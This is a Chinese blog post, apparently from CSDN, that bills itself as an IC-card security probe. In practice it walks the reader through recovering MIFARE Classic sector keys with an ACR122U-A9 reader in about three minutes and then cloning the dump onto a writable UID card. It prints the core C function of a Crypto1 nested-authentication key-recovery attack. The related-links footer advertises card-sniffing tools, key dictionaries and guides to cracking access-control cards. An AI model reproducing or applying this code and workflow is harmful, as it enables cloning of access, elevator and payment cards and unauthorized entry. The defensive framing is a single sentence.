安防人必备神器,IC卡安全极速探测工具。

已于 2023-05-11 20:58:51 修改
阅读量1.1k 收藏 5
点赞数 8
文章标签: 安全
于 2023-05-11 20:57:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_16153407/article/details/130629443
版权

        从磁条卡到ID卡再到IC卡,安全性能不断提升,但现在连CPU卡都被破解了。作为设备厂家,我们需要不断提高自身的安全性能,对抗市面上各种解密设备。只有深入了解漏洞,才能更好地保护我们的用户信息。本文提供了一份针对漏洞IC卡的安全性能探测代码,使用ACR122U-A9硬件,IC卡加密了1到14扇区。然而,整个破解过程不超过3分钟,这再次说明了IC卡全扇区加密的重要性。我们必须不断提高自身的技术水平,以保护用户信息的安全。

连接ACR122U-A9读卡器,安装读卡器驱动程序,放上要探测的IC卡。

双击 ConsoleApplication1.exe程序开始运行。
等待3分钟左右程序运行完毕:

 

可看到IC卡各扇区各块的密钥。

软件目录生成一个带有卡片全部信息的文件。
打开UID卡读写软件,发卡器上放置UID卡。

 点击连接读卡器,连接卡片,导入文件,点击写卡即可。
附上软件核心代码提供参考:

//! MiFare cracking, nested authentication, recover key, distance keys
/** @param e_sector Exploit sector (where the key is known from)
 * @param a_sector The sector to crack
 * @param t The mifare tag
 * @param r The mifare reader
 * @param d Revealed information about the nonce
 * @param pk Possible Keys
 * @param mode 'r' for recovery, 'd' for distance
 * @param dumpKeysA Crack key A
 * @return 0
 */
uint32_t mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce* d, pKeys* pk, char mode, bool dumpKeysA, void (*UpdateStatusMessage)(const char* status)) {
	struct Crypto1State* pcs;
	struct Crypto1State* revstate;
	struct Crypto1State* revstate_start;

	uint64_t lfsr;

	// Possible key counter, just continue with a previous "session"
	uint32_t kcount = pk->size;

	uint32_t Nt;
	uint8_t Nr[4] = { 0x00,0x00,0x00,0x00 }; // Reader nonce
	uint8_t Auth[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 };
	uint8_t AuthEnc[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 };
	uint8_t AuthEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };

	uint8_t ArEnc[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
	uint8_t ArEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };

	uint8_t Rx[MAX_FRAME_LEN]; // Tag response
	uint8_t RxPar[MAX_FRAME_LEN]; // Tag response
	size_t RxLen;

	uint32_t NtLast, NtProbe, NtEnc, Ks1, m;

	int i;

	// Prepare AUTH command
	Auth[0] = (t.sectors[e_sector].foundKeyA) ? 0x60 : 0x61;
	append_iso14443a_crc(Auth, 2);

	// We need full control over the CRC
	if (!nfc_configure(r.pdi, NDO_HANDLE_CRC, false)) {
		nfc_perror(r.pdi, "nfc_configure");
		
		return 0;
	}

	// Request plain tag-nonce

	if (!nfc_configure(r.pdi, NDO_EASY_FRAMING, false)) {
		nfc_perror(r.pdi, "nfc_configure");
		
		return 0;
	}

	if (!nfc_initiator_transceive_bytes(r.pdi, Auth, 4, Rx, &RxLen)) {
		UpdateStatusMessage("Error while requesting plain tag-nonce.");
		
		return 0;
	}

	if (!nfc_configure(r.pdi, NDO_EASY_FRAMING, true)) {
		nfc_perror(r.pdi, "nfc_configure");
		
		return 0;
	}

	// Save the tag nonce (Nt)
	Nt = bytes_to_num32(Rx, 4);

	// Init the cipher with key {0..47} bits
	if (t.sectors[e_sector].foundKeyA)
		pcs = crypto1_create(bytes_to_num64(t.sectors[e_sector].KeyA, 6));
	else
		pcs = crypto1_create(bytes_to_num64(t.sectors[e_sector].KeyB, 6));

	// Load (plain) uid^nt into the cipher {48..79} bits
	crypto1_word(pcs, bytes_to_num32(Rx, 4) ^ t.uid, 0);

	// Generate (encrypted) nr+parity by loading it into the cipher
	for (i = 0; i < 4; i++) {
		// Load in, and encrypt the reader nonce (Nr)
		ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i];
		ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]);
	}
	// Skip 32 bits in the pseudo random generator
	Nt = prng_successor(Nt, 32);
	// Generate reader-answer from tag-nonce
	for (i = 4; i < 8; i++) {
		// Get the next random byte
		Nt = prng_successor(Nt, 8);
		// Encrypt the reader-answer (Nt' = suc2(Nt))
		ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ (Nt & 0xff);
		ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt);
	}

	// Finally we want to send arbitrary parity bits
	nfc_configure(r.pdi, NDO_HANDLE_PARITY, false);

	// Transmit reader-answer
	if ((!nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, &RxLen, RxPar)) || (32 != RxLen)) {
		UpdateStatusMessage("Reader-answer transfer error, exiting..");
		return 0;
	}

	// Decrypt the tag answer and verify that suc3(Nt) is At
	Nt = prng_successor(Nt, 32);
	if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num32(Rx, 4)) == (Nt & 0xFFFFFFFF))) {
		UpdateStatusMessage("[At] is not Suc3(Nt), something is wrong, exiting..");
		return 0;
	}

	// If we are in "Get Recovery" mode
	if ('r' == mode) {
		// Again, prepare the Auth command with MC_AUTH_A, recover the block and CRC
		Auth[0] = dumpKeysA ? 0x60 : 0x61;
		Auth[1] = a_sector;
		append_iso14443a_crc(Auth, 2);

		// Encryption of the Auth command, sending the Auth command
		for (i = 0; i < 4; i++) {
			AuthEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ Auth[i];
			// Encrypt the parity bits with the 4 plaintext bytes
			AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]);
		}
		if (!nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar, Rx, &RxLen, RxPar)) {
			UpdateStatusMessage("Error requesting encrypted tag-nonce.");
			return 0;
		}

		// Save the encrypted nonce
		NtEnc = bytes_to_num32(Rx, 4);

		// Parity validity check
		for (i = 0; i < 3; ++i)
			d->parity[i] = (oddparity(Rx[i]) != RxPar[i]);


		// Iterate over Nt-x, Nt+x
		// fprintf(stdout, "Iterate from %d to %d\n", d->median-TOLERANCE, d->median+TOLERANCE);
		NtProbe = prng_successor(Nt, d->median - d->tolerance);
		for (m = d->median - d->tolerance; m <= d->median + d->tolerance; m += 2) {

			// Try to recover the keystream1 
			Ks1 = NtEnc ^ NtProbe;

			// Skip this nonce after invalid 3b parity check
			revstate_start = NULL;
			//int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, uint8_t * parity) {
			if ((odd_parity((NtProbe >> 24) & 0xFF) == ((d->parity[0]) ^ odd_parity((NtEnc >> 24) & 0xFF) ^ BIT(Ks1, 16))) & \
				(odd_parity((NtProbe >> 16) & 0xFF) == ((d->parity[1]) ^ odd_parity((NtEnc >> 16) & 0xFF) ^ BIT(Ks1, 8))) & \
				(odd_parity((NtProbe >> 8) & 0xFF) == ((d->parity[2]) ^ odd_parity((NtEnc >> 8) & 0xFF) ^ BIT(Ks1, 0)))) {
				//if (valid_nonce(NtProbe, NtEnc, Ks1, d->parity)) {
				// And finally recover the first 32 bits of the key
				revstate = lfsr_recovery32(Ks1, NtProbe ^ t.uid);
				if (NULL == revstate_start)
					revstate_start = revstate;

				while ((revstate->odd != 0x0) || (revstate->even != 0x0)) {
					lfsr_rollback_word(revstate, NtProbe ^ t.uid, 0);
					crypto1_get_lfsr(revstate, &lfsr);
					// Allocate a new space for keys
					if (((kcount % MEM_CHUNK) == 0) || (kcount >= pk->size)) {
						pk->size += MEM_CHUNK;
						// fprintf(stdout, "New chunk by %d, sizeof %lu\n", kcount, pk->size * sizeof(uint64_t));
						pk->possibleKeys = (uint64_t*)realloc((void*)pk->possibleKeys, pk->size * sizeof(uint64_t));
						if (NULL == pk->possibleKeys) {
							UpdateStatusMessage("Memory allocation error for pk->possibleKeys.");
							
							return 0;
						}
					}
					pk->possibleKeys[kcount] = lfsr;
					kcount++;
					revstate++;
				}
				free(revstate_start);
			}
			NtProbe = prng_successor(NtProbe, 2);
		}
		// Truncate
		if (0 != kcount) {
			pk->size = --kcount;
			if (NULL == (pk->possibleKeys = (uint64_t*)realloc((void*)pk->possibleKeys, pk->size * sizeof(uint64_t)))) {
				UpdateStatusMessage("Memory allocation error for pk->possibleKeys.");
				
				return 0;
			}
		}
	} // If we are in recovery mode

	// If we are in "Get Distances" mode
	else if ('d' == mode) {
		for (m = 0; m < d->num_distances; m++) {
			// Encrypt Auth command with the current keystream
			for (i = 0; i < 4; i++) {
				AuthEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ Auth[i];
				// Encrypt the parity bits with the 4 plaintext bytes
				AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]);
			}

			// Sending the encrypted Auth command
			if (!nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar, Rx, &RxLen, RxPar)) {
				UpdateStatusMessage("Error requesting encrypted tag-nonce.");
				
				return 0;
			}

			// Decrypt the encrypted auth 
			if (t.sectors[e_sector].foundKeyA) {
				pcs = crypto1_create(bytes_to_num64(t.sectors[e_sector].KeyA, 6));
			}
			else {
				pcs = crypto1_create(bytes_to_num64(t.sectors[e_sector].KeyB, 6));
			}
			NtLast = bytes_to_num32(Rx, 4) ^ crypto1_word(pcs, bytes_to_num32(Rx, 4) ^ t.uid, 1);

			// Save the determined nonces distance
			d->distances[m] = nonce_distance(Nt, NtLast);

			// Again, prepare and send {At}
			for (i = 0; i < 4; i++) {
				ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i];
				ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]);
			}
			Nt = prng_successor(NtLast, 32);
			for (i = 4; i < 8; i++) {
				Nt = prng_successor(Nt, 8);
				ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ (Nt & 0xFF);
				ArEncPar[i] = filter(pcs->odd) ^ oddparity((uint8_t)Nt);
			}
			nfc_configure(r.pdi, NDO_HANDLE_PARITY, false);
			if ((!nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, &RxLen, RxPar)) || (RxLen != 32)) {
				UpdateStatusMessage("Reader-answer transfer error, exiting..");
				
				return 0;
			}
			Nt = prng_successor(Nt, 32);
			if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num32(Rx, 4)) == (Nt & 0xFFFFFFFF))) {
				UpdateStatusMessage("[At] is not Suc3(Nt), something is wrong, exiting..");
				
				return 0;
			}
		} // Next auth probe

		// Find median from all distances
		d->median = median(*d);
		//fprintf(stdout, "Median: %05d\n", d->median);
	} // The end of Get Distances mode

	crypto1_destroy(pcs);
	return 0;
}

二月刀
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
IC 电梯 门禁 嗅探工具 变色龙RDV2.0.zip
05-25
IC 电梯 门禁 嗅探工具 变色龙RDV2.0.zip
M1读写软件(Acr122)
03-28
Acr122专用读写软件,可写16扇区(S50,1K),不支持S70(4K)
ACR122密钥X字典
henan371的博客
07-28 2189
遇上不认识的字怎么办?查字典啊,遇上无漏洞,无法解密,你可以使用该软件查找字典,看你的密钥是否在字典中,如果在,你很幸运,软件给你找出密钥。 打开软件 选择你要测试密钥的扇区,设置要测试A密钥还是B密钥,然后你可以使用软件自带的密钥字典,你也可以把你找到的最新字典拖入软件使用,然后点开始分析,软件就开始测试字典中的密钥。 1分钟大约测试600个密钥,你可以计算出大约需要多长时间。 如果你的密钥在字典中,软件是可以找出这个密钥的,只是时间问题,如果你的密钥不在字典中,那是没有办法找出密钥的。因此要有心理准
NFC Tool 免vip,使用联动密钥破解加密门禁教程
最新发布
huliNo1的博客
02-18 9420
3、打开app -> 一键读写-> 点击使用联动密钥按钮-> 点击加载-> 选择密钥txt文件-> 点击确定-> 开始读-> 等待破解完成。分割文件代码可以参考 spliteKey.js, 在node.js 环境下使用。下载文件建议每8000个密钥一个文件,避免文件过大,加载密钥导致软件崩溃。1、下载密钥txt文件到手机目录。2、安装nfc_tool.apk。4、其他模拟门禁过程参考官方文档。本项目将不定期更新密钥~~~~
ACR122U-A9读写软件
qq_17173743的博客
11-08 1132
ACR122U工具合集包 M1/UID/CUID/FUID/UFUID/RFID读写格式化 含CUID写错导致无法写入SAK修复 非全加密密钥解码 全加密密钥解码 命令读写功能
安防与监控中的电梯IC控制系统技术方案
10-22
 IC电梯控制及收费系统是集计算机技术、网络技术、自动控制技术、IC感应技术为一体的完善的智能电梯控制系统。主要有:楼层控制型、呼梯控制型。同时具有控制和收费的功能。  本项目选用:
简述三大安防红外探测技术的应用
01-20
 探测在工作的时候经常会受到一些人为的故意破坏或者其他物体不慎进入的干扰,探测利用电磁感应的原理,利用有交流电通过的线圈,产生迅变化的磁场。这个磁场能在金属物体内部能感生涡电流。涡电流又会产生...
基于红外探测原理的多路无线安防系统设计
01-19
摘要:为了实现对重大安全场所无线自动报警和监控,根据热释电红外传感的基本原理,设计并实现了一种接收移动人体辐射出得红外线检测仪,该检测仪以ATmega16单片机为控制中心,融合了无线通信技术和信号检测技术等,...
ACR122U密钥X字典高级版V6
05-19
无漏洞和全加密都让ACR122U束手无策,该软件自带密钥字典,自动验证片密钥,如果密钥在字典中,就可以找出密钥。你可以在网络上查找更强大的字典,放在软件中使用
ACR122读写软件,亲测可用,不需要注册,直接读写的,不是破解加密软件
12-25
ACR122读写软件,亲测可用,不需要注册,直接读写的,不是破解加密软件
ACR122U-A9 SDK+全套软件
04-06
ACR122U-A9 SDK+全套软件 软件是在淘宝上买的,内容是SDK全套软件+读写解密软件,软件全中文版亲测可用。
Acr122密钥X字典.rar
07-28
在字典中查找密钥,无漏洞K的密钥查找
Acr122u批量加密软件V1.32.rar
06-11
可以快批量加密IC,可以加密的同时写入10进制或16进制号,号自动加1,可以快批量恢复片出厂密码,支持Acr122u读写,免费试用。软件操作视频教程 https://www.iqiyi.com/v_19rxmetq74.html
利用RFIDIOt和NFC进行Hitag2密码暴力破解: Python代码实现
qq_38334677的博客
05-21 964
RFID即无线射频识别,是一种通信技术,可以通过无线电信号读取、捕获和保存终端上的信息。这项技术在物流、零售、医疗等领域有着广泛的应用。NFC即近场通信,是一种短距离的高频无线通信技术,允许电子设备之间进行非接触式点对点数据传输。Hitag2是一种常见的RFID标签,广泛应用于汽车防盗系统、门禁系统等。由于其安全性在过去被广泛认可,很多设备都采用了这种标签。但近年来随着密码破解技术的发展,Hitag2的安全性受到了一些挑战。
CPU解析和操作说明
xqhrs232的专栏
06-17 5382
原文地址::http://blog.csdn.net/red_sky_blue/article/details/42553667 相关文章 1、Cpu操作的基本方法指令----https://wenku.baidu.com/view/94a9230652ea551810a687ba.html 第一部分 CPU基础知识 一、为什么用CPU IC从接口方式上
[原创]用逻辑嗅探破解接触式IC口令
weixin_33824363的博客
04-03 5009
最近两周对接触型IC很感兴趣,就动手实践了一下,最终实现的效果是通过破解IC口令实现对数据修改,然后就可以随意洗衣服喽~IC从数据传递方式上划分为接触型和非接触型两种。接触型的片表面有金属贴片,用于连接内芯片和外界具(洗衣机,电表,打水)。而非接触性的片则是通过射频信号与具进行信息传递。IC本身是无源的,需要依靠外部具提供的能量驱动内部电路。时下更流行是非接触型的IC或称射...
通(M1)破解过程记录——获取扇区密钥
热门推荐
人生如逆旅,我亦是行人
07-15 4万+
前些日子在研究学校的一通安全,在此记录一下一通破解的全过程,仅用作学习交流,切勿用于违法用途 其他几篇: 一通(M1)破解过程记录——准备篇 理论篇 数据分析篇 一般淘宝卖的pm3都送比较高级的windows下的GUI软件,这个软件使用比较傻瓜化而且一般附带教程,我在这里不再介绍详细的使用过程,假设你的pm3是自己组装的或者没有附带国...
感应式IC银行金库及储蓄所门禁管理系统方案(080908改).doc
06-17
感应式IC银行金库及储蓄所门禁管理系统方案(080908改)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

二月刀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值